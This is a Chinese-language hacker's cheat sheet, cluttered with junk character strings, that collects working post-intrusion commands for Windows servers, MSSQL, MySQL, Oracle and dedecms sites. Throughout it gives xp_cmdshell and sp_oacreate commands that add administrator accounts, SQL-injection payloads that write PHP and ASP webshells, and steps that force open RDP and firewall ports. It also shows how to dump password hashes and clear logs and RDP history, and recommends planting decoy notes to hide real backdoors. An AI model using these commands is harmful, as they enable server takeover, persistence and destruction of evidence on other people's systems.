9 F1 E2 U8 Q+ S7 l2 x- P1.net user administrator /passwordreq:no
2 q- B# u3 w7 i& k* Z这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
) ?2 z. g) M' {2.比较巧妙的建克隆号的步骤
o2 z! a' R- @( [5 Q8 g先建一个user的用户9 ]- H) K( r1 M E# x& v; w
然后导出注册表。然后在计算机管理里删掉
! Q8 \$ F* ~, c, \在导入,在添加为管理员组, ^1 u, }& x# u
3.查radmin密码7 V Y1 v4 ~5 ~9 _
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg2 [, Y4 |4 J4 Z" L6 R n2 N1 ]+ z% m
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
6 k0 s% U* S+ y0 f8 D建立一个"services.exe"的项
6 m# M% J; V. I再在其下面建立(字符串值)
; g! b3 k0 I3 s5 C键值为mu ma的全路径
- {1 ]8 A9 c6 _/ v" V5.runas /user:guest cmd
' K1 p* d' l' P测试用户权限!
5 s% H2 y7 M, D- d! z3 \& y6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?# `; r7 h* r5 D, ?0 n) P
7.入侵后漏洞修补、痕迹清理,后门置放:
) d9 N i' k, Z! j基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
7 T8 W7 A' ^# D9 I8 o, q( d' r- s8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c# ^' M) ~% I% K* L
- a6 ^$ P1 l$ v" l" d4 D
for example4 M& `2 U* i1 n3 v. z( K
5 y x6 {8 R) r! Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add') O- T( t9 Z" o5 ]. r
" H6 H5 Y$ R' |2 ^+ @( B ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
' s6 C& y, T0 T) C5 I7 Q( s, t5 P. K9 i
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
# D+ P) f: t+ r9 C/ w如果要启用的话就必须把他加到高级用户模式7 K: N# P9 L0 e$ r
可以直接在注入点那里直接注入
6 n3 z/ ^: |5 Z% y' {id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
" c" s9 Y0 U1 F& c3 G然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
( a2 x- I4 L8 c3 V, j+ x或者! n; S( @7 M( z/ o8 R
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'# N4 \! v& Z7 x x9 @
来恢复cmdshell。! ~* {4 g! R2 E. A1 Q
8 o$ } k* v3 q. \6 K& P分析器2 ~: M, _1 D+ _4 ]' I8 o9 [
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
$ A8 A9 W; p0 Y U# j' g然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
% Y7 o9 G3 N9 r6 \1 \3 t& B( s: J10.xp_cmdshell新的恢复办法
1 { j. c; m6 j: b& S; V/ l, ]xp_cmdshell新的恢复办法
# x. j4 W2 y$ I! m+ m* j$ m扩展储存过程被删除以后可以有很简单的办法恢复:2 a, c0 q0 y# |) G2 }: f3 O* m6 A; z
删除8 B3 h6 X+ | s7 _
drop procedure sp_addextendedproc0 N x& x: Q+ y0 Y5 A
drop procedure sp_oacreate
: T7 ~# d# l9 R2 O+ m; ]exec sp_dropextendedproc 'xp_cmdshell': F$ C2 [5 v7 }% C& ]; v. L0 t
Y' y( W7 r& V! P恢复
3 {& j" ?* z. j/ w/ p3 gdbcc addextendedproc ("sp_oacreate","odsole70.dll")5 r) k: G% i4 w7 @9 Y% U; \% D
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
2 P/ l8 Y8 p: }$ O) F! e2 m
' \' K" b2 l2 [% a& t这样可以直接恢复,不用去管sp_addextendedproc是不是存在
, i2 _) [1 l( o4 v
+ K: A% Z- n0 M. b" s! x+ j-----------------------------3 u; C1 d5 Q. i4 M& Q
6 B, L, M0 t/ @ S- {删除扩展存储过过程xp_cmdshell的语句:! X5 A: N5 m; [' d0 l0 l" z
exec sp_dropextendedproc 'xp_cmdshell'* y& `4 t2 q, O6 d: x% [
8 ]8 [& u1 \; h1 i" ?9 |" u
恢复cmdshell的sql语句6 U2 z, _" r5 _, q: C
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'- V4 }" Q; x' o8 D" I+ L
* g2 |) R6 @! G O1 N2 G3 [) x+ x$ U/ a
开启cmdshell的sql语句
, R8 T* Z8 _% K( k3 ~" K" J6 ?+ ?; Q$ D9 E4 l' n1 k1 W
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'6 F: y$ `6 A( X0 V/ R2 o
1 H* B. C. M. e8 L9 y, ~
判断存储扩展是否存在
6 ~+ [! x$ X4 [: P) Pselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'8 U9 P9 D9 f2 Y" q, R' P. ?
返回结果为1就ok# D7 O4 ~$ V* r# \; g# H
& w; l/ } L" Q0 O% n3 X
恢复xp_cmdshell# v$ ]# v' O( O& a
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'3 u9 J5 k- |+ j
返回结果为1就ok" c4 U. _; {' u$ `( j/ Y
2 f2 B+ q' @* _' S. C
否则上传xplog7.0.dll- I7 x3 C8 ~7 B* ^! ?' W
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'; \6 z% v- h+ e4 N7 r! {5 l
( p* ]8 z* L' I! ?1 O
堵上cmdshell的sql语句
* N: Y+ W* j1 O0 j V/ ?0 Nsp_dropextendedproc "xp_cmdshel- `) k, A& g% s* V, h
-------------------------
! N) p9 h0 c; k/ q4 R1 X( `清除3389的登录记录用一条系统自带的命令:
: E# h6 l. W+ x' vreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f C& p# _# ]$ [( `* q1 Z
J. z8 H8 l% V! E
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
9 S8 m' r& G. h在 mysql里查看当前用户的权限
2 a: C! V/ d( V) Wshow grants for
9 v6 l* x3 a# D3 ~! A( m
* ^$ k# ^' a& Q: M7 P0 n以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
& ?+ P& ?$ {. y8 {4 `' M: Z) Q$ C! M; F5 N+ v; P" C
5 c6 w$ F* L/ D+ L" |Create USER 'itpro'@'%' IDENTIFIED BY '123';, g) Z$ J) R# b6 H6 g
" q' j6 ~* Z$ MGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
. B3 J' n, C; C% F2 z8 p. q
/ H4 j( `, M0 N( `; K' G7 g+ QMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 `9 _- t3 d! ~3 _3 M+ z* @3 d% y
. y( A9 \% S; D/ w, NMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
2 X5 Z' I( y) C" Z' n% }6 q! y5 @/ a, o# j; r# Y- f$ h+ s" T
搞完事记得删除脚印哟。, N. _: ^) D" ?) u: J" e
% Z0 h( z8 ~2 P/ eDrop USER 'itpro'@'%';
& o7 z' B0 V: `. n. @% P% P" k$ `$ Q) I5 x) l$ g" [/ U
Drop DATABASE IF EXISTS `itpro` ;
* L. U2 `2 |6 S$ }4 v& F! y* I! L3 @* E0 A' Y
当前用户获取system权限' Z+ o9 Z8 ^9 i0 x' D# [
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
# C. X7 f- W9 z: o( Ssc start SuperCMD0 R, [: M* v: }8 P0 L- @. P" e. n
程序代码4 K4 Z7 G. \: p) r- Q. @& S7 D3 i
<SCRIPT LANGUAGE="VBScript">) S) Z; N, J& k& }0 U7 w
set wsnetwork=CreateObject("WSCRIPT.NETWORK")+ d% }7 N& v4 g, d6 j
os="WinNT://"&wsnetwork.ComputerName- G5 r2 o8 @7 n
Set ob=GetObject(os)' S& z4 Q2 N" ?2 j
Set oe=GetObject(os&"/Administrators,group")6 s% ]# q; X J2 C) h$ h7 i ^1 }
Set od=ob.Create("user","nosec")6 w) G$ b a" A v/ \
od.SetPassword "123456abc!@#"; `! @* G$ p$ y4 b1 k7 s: |/ M: V: [1 A
od.SetInfo
3 c$ o7 j1 g# s+ v; z: @* n& ISet of=GetObject(os&"/nosec",user)
3 s5 Y8 g5 K+ _: t% K8 y" Ooe.add os&"/nosec"/ I- s/ ^! z% ^7 r6 T
</Script>
' j" G3 @ B: t0 j<script language=javascript>window.close();</script>& B3 c' v- r* r- \" `
2 |- d( N3 L8 q6 q) e5 i1 U$ I9 A1 \6 r8 @
2 R$ y* F2 _3 G- p2 l- w! [$ D# Z9 z4 }. l) c W
突破验证码限制入后台拿shell
( ^$ B! Q1 B! c4 }+ G程序代码
3 |" D* Z2 C- aREGEDIT4 . n% o) ~: E9 A+ H. l( e! P
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] " _( A& g3 G7 t' Y
"BlockXBM"=dword:000000007 j' i' d; ]; @ ~$ K x+ @9 S. d I
6 W# B- a" o- I# M/ a+ D+ s
保存为code.reg,导入注册表,重器IE% k% k4 O* ], g
就可以了
9 O% x$ x7 C- |# E- ~union写马
) S6 D0 t* k$ e程序代码7 W8 A, s: J1 ?) d
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*# G3 K8 s" v, t) N
: b* I7 ]# \* E9 M( ^
应用在dedecms注射漏洞上,无后台写马3 R" w$ Z7 u' C; ^" c1 r
dedecms后台,无文件管理器,没有outfile权限的时候
, g! o" Z8 d: R7 h3 w4 B在插件管理-病毒扫描里
( P" h, p' f4 W写一句话进include/config_hand.php里
9 o+ ]6 L h0 k" d* |; E3 B程序代码
+ O1 v( }2 m% M>';?><?php @eval($_POST[cmd]);?>% b3 D& x9 G q9 X0 Q
" D1 z/ g# F0 W0 C
; v* R- l+ \$ x# e ^如上格式# O: V- }2 e8 F4 e+ g; K
4 `' U" M7 d+ y9 W( x! s" ioracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解2 c: k- \& e& X# C/ j2 Q
程序代码3 a$ I8 P" S+ t5 `
select username,password from dba_users;
' @& V: O2 y6 d. E E2 `
$ k* A) J7 t4 r! V& Z5 X! F& ^. I2 c* u
mysql远程连接用户: j$ |! P9 ?) o. c# l3 @/ C
程序代码, p- x4 {; T! _+ Q
9 D8 _1 {; F7 C& p& W; K$ S/ MCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';' _" I0 ]( o* d+ E# t
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
7 N8 ]. K& ~4 k6 d6 o# R: QMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0+ [4 q R: A, E2 E% z3 {
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;$ s# |: h- k0 V6 X; D0 L6 d; I3 q6 _
5 l9 u2 N9 v- U3 P3 E
5 B7 k9 ^8 Q5 f5 t1 t( f7 m# j% U9 f7 m
) Q# c/ R% d( i, L- Z
' d5 Q' W9 I' u8 f" ] x- Q2 S' R( Vecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
( A! j/ H) B {1 s' T+ t* D1 i& n/ Q% _. s1 V0 G: s
1.查询终端端口! `3 [1 ]1 m7 q; F4 |6 h
$ Y0 N) x, L6 J" r
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber; I% x* ]3 w! ^+ N
& { N9 y& v8 v- S( x通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"# j. _; M: o& n; |0 e
type tsp.reg
8 C4 S X! n# B p( g; P3 g) |$ j( z% R) ~- E( m% R( N0 z
2.开启XP&2003终端服务
* T5 F- E$ T+ k0 w
0 S/ v% K2 q3 ~/ ^0 ^; ~3 x" O$ q
& l. F2 b3 V9 z IREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
+ M( t; L7 k1 F9 O% h. J8 o5 v7 B# P. g! D1 s% \
$ t- f& B' @ }( n4 o6 _9 N/ DREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f1 i& U2 B# D+ q3 c# v9 s. q
4 ]. n2 L3 a3 q) x
3.更改终端端口为20008(0x4E28)
* ^5 e2 u# _- E0 M$ ]. N) M& [9 ~2 w- Q; y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
: _, B H) M U* T& J( a1 \7 I3 F
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
5 W) ?5 L9 I; ^2 e* x0 d3 B
3 T0 ]* B s; i! L9 n* e4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
6 e% ?" D! |/ z' U& i5 l, u0 m" Y
. O E* H b/ I0 [6 r0 kREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f" Y& S6 G5 [) v
( @3 G# Z2 c: k+ y% l5 t- J
. V' t1 T c; |5.开启Win2000的终端,端口为3389(需重启)$ t/ @5 f$ b( t0 S( J) o& C
/ O/ ^ E: c0 U& L5 R) Z4 mecho Windows Registry Editor Version 5.00 >2000.reg * S3 K, m6 ], K
echo. >>2000.reg
# H3 j$ n. X2 R3 I0 Mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 2 N# ? y8 W3 s
echo "Enabled"="0" >>2000.reg 8 j6 U1 _/ S+ ]4 } Q* B
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 3 }0 X3 H" r9 K) H# R: J8 b# b
echo "ShutdownWithoutLogon"="0" >>2000.reg
+ o7 g9 B {: m7 e, P# @9 \ }8 wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
! @6 E* h( t# d7 B# q% M: secho "EnableAdminTSRemote"=dword:00000001 >>2000.reg / @# s! H1 D( l. N' @! o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
% ~9 | o: ], u" A3 becho "TSEnabled"=dword:00000001 >>2000.reg
% K% f" G7 y/ Z7 n' Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 5 \3 b0 \/ y6 ^1 v2 o
echo "Start"=dword:00000002 >>2000.reg ; I; O' K2 _: k0 Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 9 W* x) _1 h/ M
echo "Start"=dword:00000002 >>2000.reg
3 p' d, N+ ]3 I9 \+ secho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 3 [' T- t! k' p& s: r4 Y
echo "Hotkey"="1" >>2000.reg
6 T; w0 h) ^$ i& ?$ Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
& L! ~6 r$ f4 @2 }$ h' [) N$ kecho "ortNumber"=dword:00000D3D >>2000.reg
9 v* X# g+ ~7 @7 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg % {5 p. W4 u1 S8 y V
echo "ortNumber"=dword:00000D3D >>2000.reg
% q: G0 R+ D* Y" a2 B8 Q. |
_& M. j. E( c" \! o6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
. t9 _7 Q- W7 H5 z8 _
8 q, f! ^9 {, |; o1 n5 c& w@ECHO OFF & cd/d %temp% & echo [version] > restart.inf4 b' h" Z' x8 p
(set inf=InstallHinfSection DefaultInstall)
: {" ]8 g" C# ~: }) o' B+ X* F( pecho signature=$chicago$ >> restart.inf- c- x- k: R* f. p! n( |
echo [defaultinstall] >> restart.inf3 }* [# ?0 c7 t% W! W& X* A
rundll32 setupapi,%inf% 1 %temp%\restart.inf% v R. y9 u# M+ w3 |% R- g" j
+ A/ C) G* A3 f5 b. S
% _$ j4 A5 ]. k& @8 e7.禁用TCP/IP端口筛选 (需重启)8 \& }: l$ v8 E; z) _8 ?1 `
( F, K7 P) w( _, \
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f) |: S0 \6 D \4 u% I: P2 y
3 _( f1 p! Y! x* Y8.终端超出最大连接数时可用下面的命令来连接$ h; r) h/ _7 n% D" l
/ k! r( u; I3 @2 H+ Y Q( gmstsc /v:ip:3389 /console
$ u' b; ]* J7 a1 z1 Y9 i3 _; q3 ]) v
9.调整NTFS分区权限
! [5 y0 P6 S6 h9 k" {- [/ ]% c" f% y* ~
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
$ S1 ?$ i4 Z2 Z2 ?$ u/ K2 K" M; P1 E9 P
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)) E! R5 t" Y, D) D0 k/ t+ U
' @6 k9 V a# d6 h6 v+ ^6 \, h------------------------------------------------------. R2 M! V8 i6 |4 D. v1 J
3389.vbs
q/ m/ @6 G6 u! n/ ]0 fOn Error Resume Next1 t( ~5 @( W: F1 O
const HKEY_LOCAL_MACHINE = &H80000002
9 D; I) k: M% Q! ?+ l' TstrComputer = "."
, K6 Q1 a& @- nSet StdOut = WScript.StdOut
; x6 q* Q7 N$ v! \' OSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
3 G5 \9 w& c4 F {, t! \- n4 |strComputer & "\root\default:StdRegProv")
7 L. K7 v! U. Q3 `strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
, n$ \) z! \2 V& v2 Soreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath8 a- J! ?3 }6 Z# C
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"& _% {3 v# [7 t Z
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath+ v4 s7 V8 V7 V
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
( Y- Z, Q: J" u# F$ RstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
6 b1 j( l. A& k$ E) W! _# xstrValueName = "fDenyTSConnections"
8 `( }! e; S8 Q' O6 u, LdwValue = 0
* V( \: _" B7 w* a( xoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue, _. ?+ F* Z: r7 t: [* _1 r! |- S
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
; f; O* M+ b9 B% W" _strValueName = "ortNumber"
! [ j+ }! J& F& LdwValue = 3389
3 U4 |# y! _: s1 Z& ^oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue) K7 K2 d; r' B
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
9 l% ^8 Q9 N% W, `7 PstrValueName = "ortNumber"* v. b Z/ g2 m; c$ o: O/ v
dwValue = 3389/ v/ {2 A, ~5 x' A, m
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
9 N/ W& `9 s% g7 b; aSet R = CreateObject("WScript.Shell") ' x% S: Q5 v# T+ H* i
R.run("Shutdown.exe -f -r -t 0") & m' k; ?4 B6 N& O" M
6 Q5 y$ y4 |6 [0 @% w( B" p删除awgina.dll的注册表键值
2 _1 T; H& z7 q4 `! e, X1 {程序代码. G5 N( V; p0 n! A. p2 @% c
! G' J" z6 \- }& | }
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f- ^& ^( L7 P& @
6 u+ m. g$ s" D' q6 B1 T+ q _6 Z6 b- m& ^6 J, ^) s
; w% `5 W1 M/ F3 x; j( J4 [' i3 N( J7 }1 x5 f' P
程序代码6 S) z0 V4 h! n7 L' ~
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
# a& `; b9 E6 L( H6 `1 Y
R6 O& c* q- e. _9 z. m设置为1,关闭LM Hash# S4 ^- D2 X/ J+ W* b) f
% g& \9 k0 D% N- B
数据库安全:入侵Oracle数据库常用操作命令
% _: H& U( G" W) L0 S8 G最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。3 C; e6 z- K* B: t9 m5 T; j
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。" d8 |* V* u+ D+ ~) G. W; l' y' F/ u
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
, `$ h7 t5 b' j/ V( N9 Z- \' j3、SQL>connect / as sysdba ;(as sysoper)或) q( Y' }3 W) M, |5 L0 j
connect internal/oracle AS SYSDBA ;(scott/tiger)$ X: K: K4 f( K5 y# K
conn sys/change_on_install as sysdba;
+ F- j |9 L/ w1 Y4、SQL>startup; 启动数据库实例' c: r; a& w( @) a h
5、查看当前的所有数据库: select * from v$database;
3 ?# B1 r- u( w$ z5 Jselect name from v$database;
" j e8 H! ~: S5 B e+ r6、desc v$databases; 查看数据库结构字段
# Y8 v0 N5 O F& ^; ?7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
/ B: N, g% v3 y6 P1 DSQL>select * from V_$PWFILE_USERS;3 y/ H$ U! p5 ?6 w; Y, s
Show user;查看当前数据库连接用户
( Z4 ]- a) _4 O4 T+ M0 a$ @; m+ R8、进入test数据库:database test;
4 C- ]! X# o8 k& p8 E9 ]" a9、查看所有的数据库实例:select * from v$instance;
1 X# g- A1 f2 l; d; B如:ora9i- w( R o" ^6 {4 i. P
10、查看当前库的所有数据表:, V9 {! C' O) D7 @ d0 p( Y
SQL> select TABLE_NAME from all_tables;8 g$ ?5 S, I& ~# c$ L( @
select * from all_tables;5 @- M' S8 R* b+ ]' G) `
SQL> select table_name from all_tables where table_name like '%u%';
A# ?; k- z! v& m* [TABLE_NAME
5 Y( O6 O4 }, G2 r j5 n% K# ]------------------------------
# J* v" r0 J. W) b/ h& S" o_default_auditing_options_
6 t8 Y# S8 Z1 S) P' a5 }1 a* A11、查看表结构:desc all_tables;
2 O# W+ M8 k8 K' |: [; k9 A$ w5 F12、显示CQI.T_BBS_XUSER的所有字段结构:( C3 g" [" E' [2 R& h0 A3 a8 W B4 r
desc CQI.T_BBS_XUSER;: j( D! d4 M- M* X
13、获得CQI.T_BBS_XUSER表中的记录:
& l6 e4 p. g& z) }select * from CQI.T_BBS_XUSER;
- Z! `2 `; Z) \0 x# b14、增加数据库用户:(test11/test)# z- ^& f g8 i$ G+ y- i
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
# U2 i8 B7 i& A- l15、用户授权:6 b$ R5 Y% M, k* f. E
grant connect,resource,dba to test11;) y9 k3 L6 R* b
grant sysdba to test11;- Q7 r4 q ]% }6 ~) F) \
commit;1 v% F* m% b6 g! d) V V& Y5 n9 D
16、更改数据库用户的密码:(将sys与system的密码改为test.)
# w. g; o, v) r4 c- W) ialter user sys indentified by test;
w8 Y/ N4 L2 ^7 q2 _- @+ u4 Salter user system indentified by test;
5 e. N9 n( |- s9 \1 I O4 W0 G c$ N# M" [' S( D5 B0 {. w, `6 ~
applicationContext-util.xml% S& r7 o' r3 R) Q, f, x
applicationContext.xml! f# j3 [) u* w8 \: [8 B7 N
struts-config.xml ]( D8 r& Q4 K) y( \7 [
web.xml" l! `7 w, H! M. Z1 A% G: ~. [
server.xml
( j/ k `0 g# g' K. B' F( @0 \+ B% rtomcat-users.xml9 C- k! ^7 T# T9 Z6 C
hibernate.cfg.xml0 G0 H+ G5 L" Q) [6 f- V1 R
database_pool_config.xml
3 |; e& q: S- v" S
: E4 t: a: H' \' m8 t. o* u; x7 i% y9 q @1 g" |$ I L/ f+ y3 t8 I
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置) a1 V" \) O7 Q, `5 a2 G: m& L3 ^1 N
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini% B- ?3 I: R s6 q& X
\WEB-INF\struts-config.xml 文件目录结构# F; `2 S# d+ l! S* h8 L+ \
# r* @3 M# m Z( v" v6 [
spring.properties 里边包含hibernate.cfg.xml的名称& o: p2 j* i: |: M
. [$ ~- [( B( c F9 t
/ p" B$ A4 |6 V; m! I, G% k4 [) wC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
% z. X4 t+ Z+ W- J% A( U H0 r. I* c. v5 j: I
如果都找不到 那就看看class文件吧。。
' ^; q/ L9 D d# S z
i( I; }+ l( P5 q测试1:+ i7 q6 M @- m: r/ ^
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1' Z1 B4 k+ t5 W% s
M& D3 O7 l& i+ P; }' i
测试2:
5 _# [8 Z' x" i! |; X( j+ L, N
5 H9 m, Q# e& r2 {8 f G- Vcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
2 t* y' | i8 @) v+ Z, i/ Y. R/ |& @! V% @
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
, o% a$ z9 v0 l
. H/ y( Y( ~) I b1 b& YSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1 E) b" l) q3 M
9 u" }7 T7 d2 r) o6 F
查看虚拟机中的共享文件:
7 [3 \ o& a$ c+ W; @# w. ^在虚拟机中的cmd中执行
: Q8 \ R5 d1 j9 c$ K& ]\\.host\Shared Folders
+ j' H: V O# _8 m: p% B
' V/ E6 k; H; }cmdshell下找终端的技巧
3 e" U; r$ b' M, B0 y找终端:
) H' C+ V1 r' k第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! & a" Y3 i( w i! e3 g$ ^
而终端所对应的服务名为:TermService $ B8 w0 {& C. Y/ }: y
第二步:用netstat -ano命令,列出所有端口对应的PID值! . o- Z6 a; e$ `" x
找到PID值所对应的端口
' {- L8 A/ V8 W+ p+ a/ R# H
% R+ N% o r# D2 k) |查询sql server 2005中的密码hash$ ]9 ~) s: O6 @0 ?
SELECT password_hash FROM sys.sql_logins where name='sa'
@5 w8 z1 D- z1 R. K' kSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a( E9 v% }# o5 Q9 M4 ]
access中导出shell; H* D% R1 i1 |9 h
" Z; ?0 Q: i! t中文版本操作系统中针对mysql添加用户完整代码:. ?0 F/ Z7 |% o7 W$ Q
" {3 M+ w: S8 d+ o% I: ?
use test;2 @5 Y N# Q6 X- @2 o/ j0 F
create table a (cmd text);
; c9 r/ C! a/ @insert into a values ("set wshshell=createobject (""wscript.shell"") " );/ I |2 q; t# F2 R: F5 ^
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
